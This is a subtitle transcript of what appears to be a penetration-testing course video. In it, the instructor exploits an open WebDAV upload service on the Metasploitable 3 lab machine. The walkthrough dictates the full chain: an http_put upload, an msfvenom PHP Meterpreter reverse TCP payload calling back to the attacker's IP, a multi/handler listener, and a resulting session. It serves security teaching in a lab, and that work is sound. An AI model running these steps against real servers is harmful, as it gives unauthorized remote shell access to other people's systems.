1
00:00:00,300 --> 00:00:04,380
So list HTTP-related services on Metasploitable 3.

2
00:00:05,940 --> 00:00:10,870
And the service, which runs on 8585, has important information.

3
00:00:11,670 --> 00:00:12,220
That's right.

4
00:00:12,240 --> 00:00:13,570
A WebDAV service.

5
00:00:14,370 --> 00:00:21,150
So in that enumeration stage, you have enumerated that you can upload a file to the server.

6
00:00:21,900 --> 00:00:24,530
Now it's time to take advantage of this.

7
00:00:25,320 --> 00:00:27,820
Now, remembering what we did before.

8
00:00:28,440 --> 00:00:31,440
I'm going to start from the beginning so that you get in the habit of this.

9
00:00:31,920 --> 00:00:38,550
First, choose the auxiliary module that provides us with an option to upload a file on the server.

10
00:00:39,640 --> 00:00:46,270
Use auxiliary/scanner/http/http_put.

11
00:00:47,220 --> 00:00:48,650
Show me the options.

12
00:00:50,150 --> 00:00:58,850
All right, so set RHOST to 10.10.2.10, set PATH to /uploads.

13
00:01:00,000 --> 00:01:05,220
Next, you must set FILEDATA as your variable.

14
00:01:06,500 --> 00:01:13,940
Now, what we are going to do here is I'm going to create a Meterpreter reverse TCP payload and

15
00:01:14,150 --> 00:01:16,700
upload that page with this module.

16
00:01:18,100 --> 00:01:25,090
So open a new tab. msfvenom is a standalone payload generator for Metasploit.

17
00:01:26,050 --> 00:01:27,820
We're going to discuss that later.

18
00:01:28,790 --> 00:01:37,040
But right now, it's going to help us create the suitable payload, so let's type msfvenom -p.

19
00:01:38,030 --> 00:01:39,380
And the payload name.

20
00:01:40,340 --> 00:01:42,710
PHP Meterpreter.

21
00:01:44,360 --> 00:01:45,670
Reverse TCP.

22
00:01:48,140 --> 00:01:48,560
LHOST.

23
00:01:49,500 --> 00:01:57,690
Is 10.10.2.11 and port is 8585.

24
00:01:59,040 --> 00:02:04,050
-f, and that formats the payload, raw.

25
00:02:05,400 --> 00:02:07,680
And show the output file name.

26
00:02:08,630 --> 00:02:10,100
page.php.

27
00:02:12,380 --> 00:02:16,430
OK, so we've created the file that contains our payload.

28
00:02:17,270 --> 00:02:19,000
Let's go back to the msfconsole.

29
00:02:21,400 --> 00:02:24,490
Set the FILENAME to page.php.

30
00:02:26,710 --> 00:02:30,910
And set FILEDATA to the file you've just created.

31
00:02:37,770 --> 00:02:44,100
So for one last look at some of our options, controls which show options again.

32
00:02:45,510 --> 00:02:48,330
And there's nothing to change, so let's run the module.

33
00:02:51,360 --> 00:02:53,150
Don't worry about that, you can ignore this.

34
00:02:54,140 --> 00:03:02,500
So open your browser and go to 10.10.2.10:8585/uploads.

35
00:03:03,650 --> 00:03:07,190
And here is the page.php file.

36
00:03:08,070 --> 00:03:11,760
And if you click this page, yeah, goes right back to your Kali.

37
00:03:12,760 --> 00:03:19,990
All right, so that's all well and good, however, now you need to prepare a listener for this connection

38
00:03:19,990 --> 00:03:20,550
on Kali.

39
00:03:21,730 --> 00:03:24,130
So let's go back to the msfconsole.

40
00:03:26,570 --> 00:03:29,090
pushm is the name of this module.

41
00:03:30,500 --> 00:03:33,080
And let's use the multi handler.

42
00:03:35,960 --> 00:03:36,730
Set payload.

43
00:03:38,650 --> 00:03:41,350
To PHP Meterpreter.

44
00:03:42,800 --> 00:03:49,490
Reverse TCP, and that's a payload that you used previously in msfvenom.

45
00:03:50,500 --> 00:03:52,990
Set LHOST to your Kali's IP.

46
00:03:54,710 --> 00:03:57,740
Set LPORT to 8585.

47
00:03:59,830 --> 00:04:00,850
Last check.

48
00:04:02,850 --> 00:04:04,690
exploit -j.

49
00:04:05,820 --> 00:04:15,300
So now a listener will wait for incoming connections in the background, so let's go to the browser

50
00:04:15,300 --> 00:04:15,870
and.

51
00:04:17,340 --> 00:04:19,260
Click the page.php.

52
00:04:20,930 --> 00:04:21,510
Great.

53
00:04:21,740 --> 00:04:24,050
So you got the Meterpreter, session nine.

54
00:04:25,240 --> 00:04:26,860
So let's list the session.

55
00:04:29,350 --> 00:04:37,030
Now let's interact with session nine, by typing sessions -i 9.

56
00:04:38,760 --> 00:04:40,740
And now you're interacting with session nine.

57
00:04:41,670 --> 00:04:47,100
So let's quickly look at who am I, getuid.

58
00:04:48,240 --> 00:04:50,820
And where am I, so sysinfo.

59
00:04:53,000 --> 00:04:55,580
And great, so you have another session on the machine.

60
00:04:56,710 --> 00:05:00,220
And yes, you can go on to another service.